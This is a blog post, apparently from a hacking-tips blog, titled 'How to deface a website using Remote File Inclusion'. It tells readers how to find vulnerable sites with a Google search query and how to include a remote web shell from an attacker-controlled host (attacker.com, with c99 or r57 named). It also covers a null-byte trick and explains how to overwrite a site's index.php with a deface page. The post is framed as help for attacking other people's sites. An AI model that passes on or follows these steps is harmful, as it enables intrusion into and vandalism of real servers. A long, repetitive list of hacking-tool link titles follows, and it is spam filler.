samedi 20 janvier 2024

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
More information

  1. Hack Tool Apk No Root
  2. Hacker Tools For Windows
  3. How To Install Pentest Tools In Ubuntu
  4. Hack Website Online Tool
  5. Hacking Tools Usb
  6. Hacker Techniques Tools And Incident Handling
  7. Hacking Tools And Software
  8. Pentest Tools Website
  9. Nsa Hacker Tools
  10. Hack Rom Tools
  11. Tools 4 Hack
  12. Hacker Tools Linux
  13. Blackhat Hacker Tools
  14. Hak5 Tools
  15. Hacking Tools Windows
  16. World No 1 Hacker Software
  17. Hack Tools For Games
  18. Hack Tools Download
  19. Pentest Tools For Mac
  20. Best Hacking Tools 2020
  21. Blackhat Hacker Tools
  22. Pentest Tools Open Source
  23. Hacker Tools Apk
  24. Hacker Tools Mac
  25. Best Hacking Tools 2019
  26. Hacking Tools For Mac
  27. Tools 4 Hack
  28. Computer Hacker
  29. Hacker Tools Free Download
  30. Hack Website Online Tool
  31. Hacker Tools 2020
  32. Hacks And Tools
  33. Hack Tools
  34. Hacker Tools Apk
  35. Hacker Tools Software
  36. Hacker Tools For Windows
  37. Hacking Tools Software
  38. How To Hack
  39. Pentest Tools Subdomain
  40. Termux Hacking Tools 2019
  41. Game Hacking
  42. Pentest Tools Download
  43. Hacker Tools For Ios
  44. Hacker Techniques Tools And Incident Handling
  45. Pentest Tools Subdomain
  46. Hack Rom Tools
  47. Pentest Tools
  48. Pentest Recon Tools
  49. Hacker Tools Online
  50. Pentest Tools For Ubuntu
  51. Nsa Hack Tools
  52. What Is Hacking Tools
  53. Hacker Tools 2020
  54. Hack Tools
  55. Hacking Tools Windows
  56. Hacker Tools
  57. Hack Tools For Windows
  58. Hacking Tools For Windows 7
  59. Game Hacking
  60. Best Hacking Tools 2019
  61. Underground Hacker Sites
  62. Hacking Tools Hardware
  63. Hacking Tools Github
  64. Install Pentest Tools Ubuntu
  65. Hacker Tool Kit
  66. Hacking Tools Hardware
  67. Hacking Tools Online
  68. Best Pentesting Tools 2018
  69. Ethical Hacker Tools
  70. Pentest Tools Download
  71. Hacker Tools For Mac
  72. Hacker Tools Free
  73. Install Pentest Tools Ubuntu
  74. Hack Rom Tools
  75. Best Pentesting Tools 2018
  76. Pentest Tools For Windows
  77. Best Hacking Tools 2019
  78. Ethical Hacker Tools
  79. Hacker Tools Apk Download
  80. Best Hacking Tools 2019
  81. Pentest Tools Framework
  82. Pentest Tools Github
Publié par à

Aucun commentaire:

Publier un commentaire

S'abonner à : Publier des commentaires (Atom)